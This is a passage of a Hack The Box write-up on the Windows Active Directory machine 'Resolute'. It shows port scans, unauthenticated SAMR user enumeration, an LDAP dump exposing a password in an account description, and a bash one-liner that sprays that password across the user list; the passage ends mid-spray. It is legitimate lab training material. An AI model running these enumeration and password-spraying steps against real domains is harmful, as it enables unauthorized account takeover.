This Hack The Box machine is built on Windows operating system and revolves around Active Directory, LDAP, and also bad practices. Great thing about this machine just like other similar ones is that it can be very close to real-life. Active Directory is used across many Enterprise environments as their credential backbone and is a service that can allow different types of attacks if it is not setup correctly.
Resolute required a good amount of enumeration even after you gain access into the system. Along with this (spoiler I know), one finding that leads to privilege escalation is an specific group membership. Some HTB users went for this other approach, I went in a different direction.
For people not well versed in Active Directory and Windows, and even if you are, there is some reading to do, or at least I recommend to do so, which is why I've added some resources below and also other links to some tools.
Some great resources around this are below:
Resources:
Let's get started!
Initial Enumeration: Footprinting and Scanning
First of, we need to identify how to reach the system. In other words, we need to identify what are the services available from this machine.
Let's start by adding this machine's IP address to the hosts file and create an alias:
My go-to tools in this phase, which are typically used by many to start enumerating, are:
masscan: very nice port scanning tool that allows finding open ports quickly. To me this is a tool to narrow down the scope of the enumeration so we can focus on open ports only when using nmap.
Here, I am designating the interface to use when communicating to the HTB machine (-e) which will be the HTB VPN interface, along with -p to designate the port range to target but I will target ALL TCP and UDP Ports, and the transmission rate of packets per second (--rate).
Similar to this, you could also run something like this:
nmap -p- --min-rate=1000 -T4
nmap: I think most people in the information technology and security space know what nmap does. It is a very versatile Port scanning tool which also allows you to use scripts to further target the services found. Just like anything, it can be a useful tool while it can also be damaging if the user is not careful.
What I typically start with when using nmap is:
-sC: to use all default non-intrusive nmap scripts on each service
-sV: to get the service version information which is definitely important for us
-p: to designate the port we will be targeting
-vvvv: for extended verbosity (as I like as many details as I can get)
MASSCAN
root@kali:~/Documents/HTB-Labs/Resolute# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.169 --rate=1000 > Resolute_masscan.log
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-07 15:52:46 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 51883/udp on 10.10.10.169
Discovered open port 49664/tcp on 10.10.10.169
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 59104/tcp on 10.10.10.169
Discovered open port 63464/udp on 10.10.10.169
Discovered open port 59146/tcp on 10.10.10.169
Discovered open port 464/tcp on 10.10.10.169
Discovered open port 49670/tcp on 10.10.10.169
Discovered open port 3269/tcp on 10.10.10.169
Discovered open port 49666/tcp on 10.10.10.169
Discovered open port 49667/tcp on 10.10.10.169
Discovered open port 53379/udp on 10.10.10.169
Discovered open port 636/tcp on 10.10.10.169
Discovered open port 53/tcp on 10.10.10.169
Discovered open port 49677/tcp on 10.10.10.169
Discovered open port 593/tcp on 10.10.10.169
Discovered open port 47001/tcp on 10.10.10.169
Discovered open port 49676/tcp on 10.10.10.169
Discovered open port 49665/tcp on 10.10.10.169
Discovered open port 59188/tcp on 10.10.10.169
Discovered open port 135/tcp on 10.10.10.169
Discovered open port 56251/udp on 10.10.10.169
Discovered open port 389/tcp on 10.10.10.169
Discovered open port 88/tcp on 10.10.10.169
Discovered open port 3268/tcp on 10.10.10.169
Discovered open port 9389/tcp on 10.10.10.169
Discovered open port 49909/tcp on 10.10.10.169
Discovered open port 139/tcp on 10.10.10.169
Discovered open port 5985/tcp on 10.10.10.169
Discovered open port 49688/tcp on 10.10.10.169
As you can see, we found some UDP High Ports that at the moment we do not see a use for them. Below is an example of how you can filter these out and create a usable list that can make our lives easier. If you notice the output versus the list of ports I used in nmap, they are not in the same order as the below is for your benefit.
root@kali:~/Documents/HTB-Labs/Resolute# nmap -sC -sV -vvv -p51883,49664,445,59104,63464,59146,464,49670,3269,49666,49667,53379,636,53,49677,593,47001,49676,49665,59188,135,56251,389,88,3268,9389,49909,139,5985,49688 resolute.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-07 21:52 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:52
Completed NSE at 21:52, 0.00s elapsed
Initiating Ping Scan at 21:52
Scanning resolute.htb (10.10.10.169) [4 ports]
Completed Ping Scan at 21:52, 0.14s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:52
Scanning resolute.htb (10.10.10.169) [30 ports]
Discovered open port 135/tcp on 10.10.10.169
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 53/tcp on 10.10.10.169
Discovered open port 139/tcp on 10.10.10.169
Discovered open port 389/tcp on 10.10.10.169
Discovered open port 593/tcp on 10.10.10.169
Discovered open port 3269/tcp on 10.10.10.169
Discovered open port 88/tcp on 10.10.10.169
Discovered open port 464/tcp on 10.10.10.169
Discovered open port 49677/tcp on 10.10.10.169
Discovered open port 636/tcp on 10.10.10.169
Discovered open port 3268/tcp on 10.10.10.169
Discovered open port 49667/tcp on 10.10.10.169
Discovered open port 49666/tcp on 10.10.10.169
Discovered open port 49665/tcp on 10.10.10.169
Discovered open port 49676/tcp on 10.10.10.169
Discovered open port 9389/tcp on 10.10.10.169
Discovered open port 49688/tcp on 10.10.10.169
Discovered open port 47001/tcp on 10.10.10.169
Discovered open port 49664/tcp on 10.10.10.169
Discovered open port 5985/tcp on 10.10.10.169
Completed SYN Stealth Scan at 21:52, 0.27s elapsed (30 total ports)
Initiating Service scan at 21:52
Scanning 21 services on resolute.htb (10.10.10.169)
Completed Service scan at 21:53, 55.78s elapsed (21 services on 1 host)
NSE: Script scanning 10.10.10.169.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:53
Completed NSE at 21:53, 15.59s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:53
NSE Timing: About 97.02% done; ETC: 21:53 (0:00:01 remaining)
NSE Timing: About 98.21% done; ETC: 21:54 (0:00:01 remaining)
NSE Timing: About 99.40% done; ETC: 21:54 (0:00:01 remaining)
Completed NSE at 21:55, 120.53s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:55
Completed NSE at 21:55, 0.00s elapsed
Nmap scan report for resolute.htb (10.10.10.169)
Host is up, received echo-reply ttl 127 (0.12s latency).
Scanned at 2020-01-07 21:52:15 EST for 192s
PORT STATE SERVICE REASON VERSION
53/tcp open domain? syn-ack ttl 127
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-01-08 02:59:21Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp closed unknown reset ttl 127
49676/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49688/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49909/tcp closed unknown reset ttl 127
51883/tcp closed unknown reset ttl 127
53379/tcp closed unknown reset ttl 127
56251/tcp closed unknown reset ttl 127
59104/tcp closed unknown reset ttl 127
59146/tcp closed unknown reset ttl 127
59188/tcp closed unknown reset ttl 127
63464/tcp closed unknown reset ttl 127
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/7%Time=5E1543EA%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h47m00s, deviation: 4h37m10s, median: 6m59s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 36199/tcp): CLEAN (Couldn't connect)
| Check 2 (port 52471/tcp): CLEAN (Couldn't connect)
| Check 3 (port 55070/udp): CLEAN (Timeout)
| Check 4 (port 13498/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-01-07T19:00:15-08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-01-08T03:00:16
|_ start_date: 2020-01-08T01:35:15
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:55
Completed NSE at 21:55, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:55
Completed NSE at 21:55, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:55
Completed NSE at 21:55, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.81 seconds
Raw packets sent: 34 (1.472KB) | Rcvd: 31 (1.312KB)
As you can see from the open ports found, we have the following which are very important:
-> Kerberos: 88/tcp Microsoft Windows Kerberos
-> DNS: 53/tcp I scanned TCP 53 instead of both TCP/UDP 53
-> LDAP: 389/tcp Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
-> SMB: 445/tcp Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
-> LDAPS: 636/tcp
-> Windows Remote Management (WinRM): 5985/tcp Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Along with these, given that RPC and Dynamic RPC (on the TCP High Ports) are available, means to us that SAMR is also available. Why is this important? Well, SAMR or RPC over SMB, or Security Account Manager Remote Protocol, could potentially allow account enumeration with no authentication. That's a big deal, especially when Microsoft recommends to have this locked down (see Resource #5).
With that being said, let's move forward with Impacket's SAMRDump script to get user account information. This step will give you a lot of good information and we could end up using it for things like an user list.
SAMRDUMP
root@kali:~/Documents/HTB-Labs/Resolute# /opt/impacket/examples/samrdump.py -dc-ip resolute.htb -target-ip resolute.htb megabank.local/
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Retrieving endpoint list from megabank.local/
Found domain(s):
. MEGABANK
. Builtin
[*] Looking up users in domain MEGABANK
Found user: Administrator, uid = 500
Found user: Guest, uid = 501
Found user: krbtgt, uid = 502
Found user: DefaultAccount, uid = 503
Found user: ryan, uid = 1105
Found user: marko, uid = 1111
Found user: sunita, uid = 6601
Found user: abigail, uid = 6602
Found user: marcus, uid = 6603
Found user: sally, uid = 6604
Found user: fred, uid = 6605
Found user: angela, uid = 6606
Found user: felicia, uid = 6607
Found user: gustavo, uid = 6608
Found user: ulf, uid = 6609
Found user: stevie, uid = 6610
Found user: claire, uid = 6611
Found user: paulo, uid = 6612
Found user: steve, uid = 6613
Found user: annette, uid = 6614
Found user: annika, uid = 6615
Found user: per, uid = 6616
Found user: claude, uid = 6617
Found user: melanie, uid = 10101
Found user: zach, uid = 10102
Found user: simon, uid = 10103
Found user: naoki, uid = 10104
Administrator (500)/FullName:
Administrator (500)/UserComment:
Administrator (500)/PrimaryGroupId: 513
Administrator (500)/BadPasswordCount: 0
Administrator (500)/LogonCount: 62
Administrator (500)/PasswordLastSet: 2020-01-07 22:24:03.081350
Administrator (500)/PasswordDoesNotExpire: True
Administrator (500)/AccountIsDisabled: False
Administrator (500)/ScriptPath:
Guest (501)/FullName:
Guest (501)/UserComment:
Guest (501)/PrimaryGroupId: 514
Guest (501)/BadPasswordCount: 0
Guest (501)/LogonCount: 0
Guest (501)/PasswordLastSet: <never>
Guest (501)/PasswordDoesNotExpire: True
Guest (501)/AccountIsDisabled: True
Guest (501)/ScriptPath:
krbtgt (502)/FullName:
krbtgt (502)/UserComment:
krbtgt (502)/PrimaryGroupId: 513
krbtgt (502)/BadPasswordCount: 0
krbtgt (502)/LogonCount: 0
krbtgt (502)/PasswordLastSet: 2019-09-25 09:29:12.154667
krbtgt (502)/PasswordDoesNotExpire: False
krbtgt (502)/AccountIsDisabled: True
krbtgt (502)/ScriptPath:
DefaultAccount (503)/FullName:
DefaultAccount (503)/UserComment:
DefaultAccount (503)/PrimaryGroupId: 513
DefaultAccount (503)/BadPasswordCount: 0
DefaultAccount (503)/LogonCount: 0
DefaultAccount (503)/PasswordLastSet: <never>
DefaultAccount (503)/PasswordDoesNotExpire: True
DefaultAccount (503)/AccountIsDisabled: True
DefaultAccount (503)/ScriptPath:
ryan (1105)/FullName: Ryan Bertrand
ryan (1105)/UserComment:
ryan (1105)/PrimaryGroupId: 513
ryan (1105)/BadPasswordCount: 0
ryan (1105)/LogonCount: 0
ryan (1105)/PasswordLastSet: 2020-01-07 22:24:02.409469
ryan (1105)/PasswordDoesNotExpire: True
ryan (1105)/AccountIsDisabled: False
ryan (1105)/ScriptPath:
marko (1111)/FullName: Marko Novak
marko (1111)/UserComment:
marko (1111)/PrimaryGroupId: 513
marko (1111)/BadPasswordCount: 0
marko (1111)/LogonCount: 0
marko (1111)/PasswordLastSet: 2019-09-27 09:17:14.569061
marko (1111)/PasswordDoesNotExpire: True
marko (1111)/AccountIsDisabled: False
marko (1111)/ScriptPath:
sunita (6601)/FullName:
sunita (6601)/UserComment:
sunita (6601)/PrimaryGroupId: 513
sunita (6601)/BadPasswordCount: 0
sunita (6601)/LogonCount: 0
sunita (6601)/PasswordLastSet: 2019-12-03 16:26:29.108327
sunita (6601)/PasswordDoesNotExpire: False
sunita (6601)/AccountIsDisabled: False
sunita (6601)/ScriptPath:
abigail (6602)/FullName:
abigail (6602)/UserComment:
abigail (6602)/PrimaryGroupId: 513
abigail (6602)/BadPasswordCount: 0
abigail (6602)/LogonCount: 0
abigail (6602)/PasswordLastSet: 2019-12-03 16:27:30.936946
abigail (6602)/PasswordDoesNotExpire: False
abigail (6602)/AccountIsDisabled: False
abigail (6602)/ScriptPath:
marcus (6603)/FullName:
marcus (6603)/UserComment:
marcus (6603)/PrimaryGroupId: 513
marcus (6603)/BadPasswordCount: 0
marcus (6603)/LogonCount: 0
marcus (6603)/PasswordLastSet: 2019-12-03 16:27:59.256272
marcus (6603)/PasswordDoesNotExpire: False
marcus (6603)/AccountIsDisabled: False
marcus (6603)/ScriptPath:
sally (6604)/FullName:
sally (6604)/UserComment:
sally (6604)/PrimaryGroupId: 513
sally (6604)/BadPasswordCount: 0
sally (6604)/LogonCount: 0
sally (6604)/PasswordLastSet: 2019-12-03 16:28:29.622615
sally (6604)/PasswordDoesNotExpire: False
sally (6604)/AccountIsDisabled: False
sally (6604)/ScriptPath:
fred (6605)/FullName:
fred (6605)/UserComment:
fred (6605)/PrimaryGroupId: 513
fred (6605)/BadPasswordCount: 0
fred (6605)/LogonCount: 0
fred (6605)/PasswordLastSet: 2019-12-03 16:29:01.882442
fred (6605)/PasswordDoesNotExpire: False
fred (6605)/AccountIsDisabled: False
fred (6605)/ScriptPath:
angela (6606)/FullName:
angela (6606)/UserComment:
angela (6606)/PrimaryGroupId: 513
angela (6606)/BadPasswordCount: 0
angela (6606)/LogonCount: 0
angela (6606)/PasswordLastSet: 2019-12-03 16:29:43.451148
angela (6606)/PasswordDoesNotExpire: False
angela (6606)/AccountIsDisabled: False
angela (6606)/ScriptPath:
felicia (6607)/FullName:
felicia (6607)/UserComment:
felicia (6607)/PrimaryGroupId: 513
felicia (6607)/BadPasswordCount: 0
felicia (6607)/LogonCount: 0
felicia (6607)/PasswordLastSet: 2019-12-03 16:30:53.545222
felicia (6607)/PasswordDoesNotExpire: False
felicia (6607)/AccountIsDisabled: False
felicia (6607)/ScriptPath:
gustavo (6608)/FullName:
gustavo (6608)/UserComment:
gustavo (6608)/PrimaryGroupId: 513
gustavo (6608)/BadPasswordCount: 0
gustavo (6608)/LogonCount: 0
gustavo (6608)/PasswordLastSet: 2019-12-03 16:31:42.082567
gustavo (6608)/PasswordDoesNotExpire: False
gustavo (6608)/AccountIsDisabled: False
gustavo (6608)/ScriptPath:
ulf (6609)/FullName:
ulf (6609)/UserComment:
ulf (6609)/PrimaryGroupId: 513
ulf (6609)/BadPasswordCount: 0
ulf (6609)/LogonCount: 0
ulf (6609)/PasswordLastSet: 2019-12-03 16:32:19.957565
ulf (6609)/PasswordDoesNotExpire: False
ulf (6609)/AccountIsDisabled: False
ulf (6609)/ScriptPath:
stevie (6610)/FullName:
stevie (6610)/UserComment:
stevie (6610)/PrimaryGroupId: 513
stevie (6610)/BadPasswordCount: 0
stevie (6610)/LogonCount: 0
stevie (6610)/PasswordLastSet: 2019-12-03 16:33:13.438134
stevie (6610)/PasswordDoesNotExpire: False
stevie (6610)/AccountIsDisabled: False
stevie (6610)/ScriptPath:
claire (6611)/FullName:
claire (6611)/UserComment:
claire (6611)/PrimaryGroupId: 513
claire (6611)/BadPasswordCount: 0
claire (6611)/LogonCount: 0
claire (6611)/PasswordLastSet: 2019-12-03 16:33:44.808450
claire (6611)/PasswordDoesNotExpire: False
claire (6611)/AccountIsDisabled: False
claire (6611)/ScriptPath:
paulo (6612)/FullName:
paulo (6612)/UserComment:
paulo (6612)/PrimaryGroupId: 513
paulo (6612)/BadPasswordCount: 0
paulo (6612)/LogonCount: 0
paulo (6612)/PasswordLastSet: 2019-12-03 16:34:46.745427
paulo (6612)/PasswordDoesNotExpire: False
paulo (6612)/AccountIsDisabled: False
paulo (6612)/ScriptPath:
steve (6613)/FullName:
steve (6613)/UserComment:
steve (6613)/PrimaryGroupId: 513
steve (6613)/BadPasswordCount: 0
steve (6613)/LogonCount: 0
steve (6613)/PasswordLastSet: 2019-12-03 16:35:25.125917
steve (6613)/PasswordDoesNotExpire: False
steve (6613)/AccountIsDisabled: False
steve (6613)/ScriptPath:
annette (6614)/FullName:
annette (6614)/UserComment:
annette (6614)/PrimaryGroupId: 513
annette (6614)/BadPasswordCount: 0
annette (6614)/LogonCount: 0
annette (6614)/PasswordLastSet: 2019-12-03 16:36:55.592358
annette (6614)/PasswordDoesNotExpire: False
annette (6614)/AccountIsDisabled: False
annette (6614)/ScriptPath:
annika (6615)/FullName:
annika (6615)/UserComment:
annika (6615)/PrimaryGroupId: 513
annika (6615)/BadPasswordCount: 0
annika (6615)/LogonCount: 0
annika (6615)/PasswordLastSet: 2019-12-03 16:37:23.666378
annika (6615)/PasswordDoesNotExpire: False
annika (6615)/AccountIsDisabled: False
annika (6615)/ScriptPath:
per (6616)/FullName:
per (6616)/UserComment:
per (6616)/PrimaryGroupId: 513
per (6616)/BadPasswordCount: 0
per (6616)/LogonCount: 0
per (6616)/PasswordLastSet: 2019-12-03 16:38:12.278673
per (6616)/PasswordDoesNotExpire: False
per (6616)/AccountIsDisabled: False
per (6616)/ScriptPath:
claude (6617)/FullName:
claude (6617)/UserComment:
claude (6617)/PrimaryGroupId: 513
claude (6617)/BadPasswordCount: 0
claude (6617)/LogonCount: 0
claude (6617)/PasswordLastSet: 2019-12-03 16:39:56.407621
claude (6617)/PasswordDoesNotExpire: False
claude (6617)/AccountIsDisabled: False
claude (6617)/ScriptPath:
melanie (10101)/FullName:
melanie (10101)/UserComment:
melanie (10101)/PrimaryGroupId: 513
melanie (10101)/BadPasswordCount: 0
melanie (10101)/LogonCount: 0
melanie (10101)/PasswordLastSet: 2020-01-07 22:24:03.065711
melanie (10101)/PasswordDoesNotExpire: False
melanie (10101)/AccountIsDisabled: False
melanie (10101)/ScriptPath:
zach (10102)/FullName:
zach (10102)/UserComment:
zach (10102)/PrimaryGroupId: 513
zach (10102)/BadPasswordCount: 0
zach (10102)/LogonCount: 0
zach (10102)/PasswordLastSet: 2019-12-04 05:39:27.835093
zach (10102)/PasswordDoesNotExpire: False
zach (10102)/AccountIsDisabled: False
zach (10102)/ScriptPath:
simon (10103)/FullName:
simon (10103)/UserComment:
simon (10103)/PrimaryGroupId: 513
simon (10103)/BadPasswordCount: 0
simon (10103)/LogonCount: 0
simon (10103)/PasswordLastSet: 2019-12-04 05:39:58.563443
simon (10103)/PasswordDoesNotExpire: False
simon (10103)/AccountIsDisabled: False
simon (10103)/ScriptPath:
naoki (10104)/FullName:
naoki (10104)/UserComment:
naoki (10104)/PrimaryGroupId: 513
naoki (10104)/BadPasswordCount: 0
naoki (10104)/LogonCount: 0
naoki (10104)/PasswordLastSet: 2019-12-04 05:40:44.342485
naoki (10104)/PasswordDoesNotExpire: False
naoki (10104)/AccountIsDisabled: False
naoki (10104)/ScriptPath:
[*] Received 27 entries.
As mentioned, from this information, I basically created my user list to hold on to it, but we need to move on to the next and see what we can get without credentials.
Let's move to LDAP. With LDAP, we can try ldapsearch and ldapdomaindump. The last command generates different files for better or easily readable information.
LDAPSEARCH
Dumping LDAP information unauthenticated while focusing on the findings as it is a lot what we can get from a domain.
root@kali:~/Documents/HTB-Labs/Resolute# ldapsearch -x -h resolute.htb -b "dc=megabank,dc=local"
# extended LDIF
#
# LDAPv3
# base <dc=megabank,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# megabank.local
dn: DC=megabank,DC=local
.
.
.
# Marko Novak, Employees, MegaBank Users, megabank.local
dn: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Marko Novak
sn: Novak
description: Account created. Password set to Welcome123!
givenName: Marko
distinguishedName: CN=Marko Novak,OU=Employees,OU=MegaBank Users,DC=megabank,D
C=local
instanceType: 4
whenCreated: 20190927131714.0Z
whenChanged: 20191203132427.0Z
displayName: Marko Novak
uSNCreated: 13110
uSNChanged: 69792
name: Marko Novak
objectGUID:: 8oIRSXQNmEW4iTLjzuwCpw==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132140638345690606
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAaeAGU04VmrOsCGHWVwQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: marko
sAMAccountType: 805306368
userPrincipalName: marko@megabank.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=megabank,DC=local
dSCorePropagationData: 20190927221048.0Z
dSCorePropagationData: 20190927131714.0Z
dSCorePropagationData: 16010101000001.0Z
.
.
.
[*] Received 27 entries.
As you can see, we can focus only on Marko as a potential password was added to the user's account Description attribute. That password is Welcome123!.
As we try it with smbclient, which will not be a focus here, we find that password is not good with the user Marko, but that password has to mean something or be useful.
Let's try doing "password spraying" against the user list we created from samrdump while relying on ldapdomaindump. I used this tool to test this password as...might as well do it and if successful we can leverage the data we get.
LDAPDOMAINDUMP
This attempt relied on a one-liner bash script, see below:
# for user in $(cat Resolute_users.txt);do echo 'Connecting with user ' $user; ldapdomaindump -u MEGABANK\\$user -p 'Welcome123!' ldap://resolute.htb:389; done
root@kali:~/Documents/HTB-Labs/Resolute# for user in $(cat Resolute_users.txt);do echo 'Connecting with user ' $user; ldapdomaindump -u MEGABANK\\$user -p 'Welcome123!' ldap://resolute.htb:389; done
Connecting with user Administrator
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user Guest
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user krbtgt
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user DefaultAccount
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user ryan
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user marko
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user sunita
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user abigail
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user marcus
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user sally
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user fred
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user angela
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user felicia
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user gustavo
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user ulf
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
Connecting with user stevie
[*] Connecting to host...
[*] Binding to host
[!] Could not bind with specified credentials
[!] {'result': 49, 'description': 'invalidCredentials', 'dn': '', 'message': '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839\x00', 'referrals': None, 'saslCreds': None, 'type': 'bindResponse'}
